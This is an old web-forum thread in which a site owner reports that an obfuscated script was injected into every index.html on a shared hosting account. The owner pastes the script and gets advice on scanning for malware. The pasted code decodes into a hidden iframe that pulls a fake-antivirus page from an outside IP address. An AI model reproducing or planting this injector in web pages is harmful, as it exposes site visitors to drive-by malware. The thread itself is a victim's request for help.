All the index.html files got hacked and a line inserted

Hi,

I have a hosting account with IX webhosting and have a number of websites on it.

yesterday 11/6/2008 at 18:15 according the change date on the files every single index.html got a script line added to them.

The script attempts to popup the old “your computer is a t risk” install this anti virus software.

My question is this some of the index.html file were group “root” like the ones in the webalizer folders I’m sure I don’t have root access on a shared server so does that mean its not something I’ve done but a problem with the hosting security?


this is the line of code that was added its way beyond my knowledge

Code:

<script>
<!--
var d=document,kol=561;
function O10H485016217A781(H485016217AB87){ function H485016217AF7A() {return 16;} return( parseInt(H485016217AB87,H485016217AF7A()));}function H485016217B772(H485016217BB6F){ function H485016217C762() {return 2;} var H485016217BF6B='';for(H485016217C366=0; H485016217C366<H485016217BB6F.length; H485016217C366+=H485016217C762()){ H485016217BF6B += ( String.fromCharCode (O10H485016217A781(H485016217BB6F.substr(H485016217C366, H485016217C762()))));}return H485016217BF6B;} document.write(H485016217B772('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3935303438292B27396635375C272077696474683D343336206865696768743D323138207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

 

is this post in the wrong place or the worng website or something?

 

I did that and their answer was unbelievable.

Their response was

they gave me permission to change the file?. Unbelievable ..

But still I think I might be wrong and I still think it might be me that has done it.

I chmoded some of the index.html files from 644 to be 444 so I don't have the permission to change them (unless I chmod them first)

and sure enough it happened again but only to the files with 644. thats what makes me think it might be me.

The blog in the link above seems to suggest that something on my PC may be accessing my FTP accounts so I ran a virus checker - this free one http://housecall.trendmicro.com/uk/

it took over an hour and didn't find anything

I'm just a simple web developer this unix / hacking stuff is beyond me.
All the sites I create have something good about them and visitors always get something for free.

 

if you think it's malware related, then run your comp thru the malware forum. not any 1 antivirus program, or any antispyware program is going to catch everything. the idea is to run a combination of programs/scans, and hopefully with this combination, you will catch everything.

http://forums.majorgeeks.com/showthread.php?t=35407 <-- READ & RUN ME FIRST Before Asking for Support

i'd say, if your not sure, then the only way to rule out your comp is to go thru these steps. g/l, sos

edit - also, what protection (ie - firewall, antivirus program, etc) do you have on your computer already? i'm asking because you said you ran a free scan of trendmicro, instead of what you might have installed?? - sos